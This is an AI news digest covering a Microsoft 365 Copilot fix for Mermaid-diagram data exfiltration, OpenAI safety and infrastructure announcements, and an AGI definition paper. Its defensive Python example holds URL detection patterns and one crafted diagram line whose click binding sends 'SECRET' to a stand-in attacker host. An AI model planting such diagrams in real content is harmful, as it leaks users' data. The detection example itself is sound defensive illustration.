Oct 27, 2025
Safety fixes, transparency pressure, and a push to define AGI
The gist
Today’s AI news clustered around trust, safety, and the growing infrastructure behind large models. Microsoft addressed a data leak pathway in Microsoft 365 Copilot that abused Mermaid diagram rendering, an example of how harmless-looking content can become an exfiltration vector once AI assistants process it. OpenAI highlighted safety upgrades for sensitive conversations in ChatGPT and published a GPT-5 system card addendum focused on mental health and jailbreak resistance, while also urging large-scale investment in energy and compute to meet future demand. On the research front, a widely discussed arXiv paper proposes a concrete definition and scoring framework for AGI rooted in human cognitive science. Rounding out the day, TechCrunch reports that OpenAI is building a generative music tool, and several thoughtful posts probe model architecture choices and the power networks that shape the industry. Expect security hardening in enterprise AI, more rigorous measurement of general intelligence, and louder calls for transparency from the companies steering the field.
Releases and updates
Microsoft 365 Copilot received a security fix after a researcher showed that Mermaid diagrams could be crafted to trigger arbitrary data exfiltration inside Copilot-enhanced workflows. For enterprises piloting AI in productivity suites, this is a reminder to audit not only prompts and plugins but also renderers and embedded visualization tools that can be abused. Microsoft characterizes the issue as fixed, and the episode will likely feed updated content-sanitization and policy rules for Copilot deployments.
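To make the attack surface concrete, here is a minimal, hypothetical pre-render check in Python. This is not Microsoft's fix; the patterns, allowlist domain, and function names are all illustrative, and a real deployment would pair a check like this with renderer-level sandboxing.

```python
import re

# Illustrative patterns only: Mermaid features that can contact external
# hosts when a diagram renders (click-to-URL bindings, raw URLs).
SUSPECT_PATTERNS = [
    re.compile(r"\bclick\b.*https?://", re.IGNORECASE | re.DOTALL),
    # Any URL outside a hypothetical corporate allowlist.
    re.compile(r"https?://(?!docs\.example\.com/)", re.IGNORECASE),
]

def mermaid_is_safe(source: str) -> bool:
    """Flag any diagram whose source could smuggle document content
    out via a crafted URL at render time."""
    return not any(p.search(source) for p in SUSPECT_PATTERNS)

benign = "graph TD; A[Draft] --> B[Review]"
crafted = 'graph TD; A --> B; click B "https://attacker.example/?q=SECRET"'
print(mermaid_is_safe(benign))   # True
print(mermaid_is_safe(crafted))  # False
```

The fail-closed choice matters here: blocking a suspicious diagram outright is safer than trying to strip payloads, since attackers can obfuscate URLs across lines and escape sequences.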
OpenAI detailed new safeguards for sensitive conversations in ChatGPT, built with input from more than 170 mental health professionals. The company reports large reductions in unsafe responses, along with improved recognition of distress and clearer guidance to real-world resources. An addendum to the GPT-5 system card focuses specifically on sensitive use cases, including new benchmarks tied to emotional reliance, mental health, and jailbreak resistance. Together these updates point to a product strategy that invests in both capability and care pathways, especially where users may be at risk.
Policy moved in parallel. In a submission framed around seizing the AI opportunity, OpenAI argues that the United States will need significant expansion of energy, data center capacity, and workforce training to sustain progress, a signal that the model roadmap is now inseparable from grid planning, permitting, and supply chains. The message to policymakers and utilities is straightforward: scaling AI requires reliable power, upstream infrastructure, and talent pipelines.
New creative tooling appears to be on deck. TechCrunch reports that OpenAI is developing a generative music product, a move that would extend the company’s media creation lineup and intensify licensing and attribution debates. If it launches, expect immediate enterprise interest in licensing-safe modes for commercial use, plus integrations with video and advertising workflows.
Why this matters for leaders
Security is not just about model outputs; it is increasingly about the full stack of content that models process. The Mermaid diagram case shows that format parsers and renderers inside office suites and copilots can become attack surfaces. CIOs should review how files, charts, and visualizations are sanitized before LLMs or AI-enhanced viewers touch them, bake these checks into data loss prevention playbooks, and ensure vendors can attest to fixes and monitoring.
Safety improvements for sensitive conversations are moving from nice-to-have to required, especially in regulated or duty-of-care environments. If your organization exposes users to AI assistants in healthcare, education, or customer support, map OpenAI’s updates to your own escalation policies and human-in-the-loop procedures. Look for measurable reductions in unsafe responses, not just policy language.
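As a sketch of what a human-in-the-loop procedure can look like in code, consider the routing stub below. The categories, threshold, and actions are placeholders, not OpenAI's implementation; a real deployment would use a validated classifier and clinically reviewed policy.

```python
from dataclasses import dataclass

# Placeholder threshold; real systems tune this against measured
# false-negative rates, not a round number.
ESCALATION_THRESHOLD = 0.7

@dataclass
class SafetySignal:
    category: str   # e.g. "self_harm", "medical", "none" (illustrative labels)
    score: float    # classifier confidence in [0, 1]

def route(signal: SafetySignal) -> str:
    """Map a safety classifier's output to an escalation action."""
    if signal.category == "self_harm" and signal.score >= ESCALATION_THRESHOLD:
        return "handoff_to_human"   # a live human takes over the conversation
    if signal.category != "none":
        return "show_resources"     # surface crisis or help resources in-line
    return "continue_ai"            # normal assistant flow

print(route(SafetySignal("self_harm", 0.92)))  # handoff_to_human
print(route(SafetySignal("medical", 0.40)))    # show_resources
```

The point of auditing against something this explicit is that every branch is testable: you can count how often each action fires and compare that to your duty-of-care obligations.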
Infrastructure is the limiting reagent. Strategic plans that assume continuous model upgrades must also assume higher power density, expanded grid interconnection, and specialized labor. Procurement teams should begin tying model adoption milestones to concrete energy and capacity commitments, including location decisions that balance latency, cost, and grid constraints.
The governance narrative is sharpening. A Wall Street Journal opinion piece calls for Microsoft to be more open about its dealings with OpenAI. Regardless of where you sit, the takeaway is clear: regulators and investors are pressing for clarity on control, safety assurances, and data governance. Expect disclosure expectations to rise, including model system cards, security incident reporting, and third-party audits.
Finally, measurement shapes markets. An AGI definition underpinned by human cognitive theory, with a ten-domain evaluation approach, will encourage buyers to look beyond single benchmarks. If the field coalesces around richer scorecards that expose jagged capabilities, procurement will shift from one-number rankings to profile-based fit, better aligning models with specific workflows.
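To see why profile-based fit differs from a one-number ranking, here is a toy comparison. The domain names loosely echo the paper's ten areas, but every score and weight below is invented for illustration.

```python
# Hypothetical capability profile: ten domain scores in [0, 1].
model_profile = {
    "reasoning": 0.82, "math": 0.78, "reading_writing": 0.90,
    "knowledge": 0.85, "working_memory": 0.60, "long_term_memory": 0.15,
    "visual": 0.55, "auditory": 0.40, "speed": 0.88, "learning": 0.35,
}

# A workflow's requirements, weighted by how much each domain matters to it.
workflow_weights = {"reading_writing": 0.4, "knowledge": 0.3,
                    "long_term_memory": 0.2, "reasoning": 0.1}

def fit_score(profile: dict[str, float], weights: dict[str, float]) -> float:
    """Weighted fit of a capability profile to one workflow, surfacing the
    jagged domains a single headline number would hide."""
    return sum(profile[d] * w for d, w in weights.items())

print(f"fit:  {fit_score(model_profile, workflow_weights):.2f}")
# The naive single-number mean masks the long_term_memory gap entirely.
print(f"mean: {sum(model_profile.values()) / len(model_profile):.2f}")
```

Two models with the same mean can have very different fits for a memory-heavy workflow, which is exactly the jaggedness richer scorecards are meant to expose.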
Field note to bookmark
A new arXiv paper proposes a practical definition of AGI, equating it to the cognitive versatility and proficiency of a well-educated adult, then operationalizes that definition using the Cattell-Horn-Carroll model from psychometrics. The authors adapt established human test batteries across ten cognitive domains, report that today’s systems show uneven strengths and weaknesses, and argue that long-term memory remains a core gap. Whether or not you agree with the scoring, the approach offers a shared language for product teams, policymakers, and researchers, and it will influence how roadmaps, safety cases, and procurement criteria are framed in the months ahead. Complement it with a thoughtful blog post asking whether LLMs should treat text as images, a provocative angle that hints at architectural unification across modalities, and with an interactive map of the AI network that helps contextualize who is connected to whom as technical and policy debates accelerate.